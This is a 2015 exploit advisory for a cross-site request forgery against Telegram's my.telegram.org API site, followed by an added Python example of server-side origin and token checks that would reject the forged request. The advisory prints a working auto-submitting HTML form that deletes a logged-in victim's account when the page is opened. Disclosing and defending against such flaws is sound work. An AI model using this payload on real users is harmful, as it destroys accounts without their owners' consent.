Telegram API Cross Site Request Forgery

2015.07.03
Credit: C4T
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/***********************************************************************************
** Exploit Title: Telegram API Cross Site Request Forgery
** Exploit Author: C4T
** Vendor Homepage: http://my.telegram.org
** Google Dork: none
** Date: 06/27/2015
** Tested on: Windows 7
************************************************************************************
** Exploit Code:
******************
<body onload="document.exploit.submit()">
<form name="exploit" action="https://my.telegram.org/deactivate/do_delete" id="deactivate_phone_form" onsubmit="return sendPassword(event);">
<input type="hidden" name="message" value="ExploitedByC4T">
</form>
*************************************************************************************
** Description:
******************
When a user is logged in to the Telegram API, just by opening a web page containing this exploit his account will be deleted.

Discovered by C4T @ Ashiyane Digital Security Team.
-------------------------------------------------------
******************************************************************************************
** More Details and Explanation:
** http://hatrhyme.com/CSRFInTelegram.pdf
******************************************************************************************
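A server-side check that would reject the request this form generates, as an added example (not code from the advisory or from Telegram, whose implementation is not shown on this page). The function names, the `csrf_token` field, the secret and the session id are assumptions, and the sample requests are constructed.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

ALLOWED_ORIGIN = "https://my.telegram.org"  # site named in the advisory
STATE_CHANGING_METHODS = {"POST"}           # destructive actions never on GET


def issue_csrf_token(secret: bytes, session_id: str) -> str:
    """Session-bound token the genuine page embeds as a hidden form field."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def check_request(method, headers, form, session_id, secret):
    """Return (allowed, reason) for a request to a destructive endpoint."""
    if method.upper() not in STATE_CHANGING_METHODS:
        return False, "method"
    # Prefer Origin, fall back to Referer, reject when neither matches.
    source = headers.get("Origin") or _origin_of(headers.get("Referer", ""))
    if source != ALLOWED_ORIGIN:
        return False, "origin"
    expected = issue_csrf_token(secret, session_id).encode()
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(expected, supplied):
        return False, "token"
    return True, "ok"


# Constructed sample data (not captured traffic).
SECRET = b"constructed-demo-secret"
SESSION = "constructed-session-id"

# The advisory's form has no method attribute, so it submits as GET and
# carries only the "message" field.
FORGED = ("GET", {"Referer": "https://attacker.example/page.html"},
          {"message": "ExploitedByC4T"})
# A cross-site POST must fail too: foreign origin and no token.
CROSS_SITE_POST = ("POST", {"Origin": "https://attacker.example"},
                   {"message": "ExploitedByC4T"})
GENUINE = ("POST", {"Origin": ALLOWED_ORIGIN},
           {"csrf_token": issue_csrf_token(SECRET, SESSION)})

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("cross_site_post", CROSS_SITE_POST),
                      ("genuine", GENUINE)):
        print(name, check_request(*req, SESSION, SECRET))
```

Setting the session cookie with `SameSite=Lax` or `SameSite=Strict` adds a browser-side layer on top of these checks.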

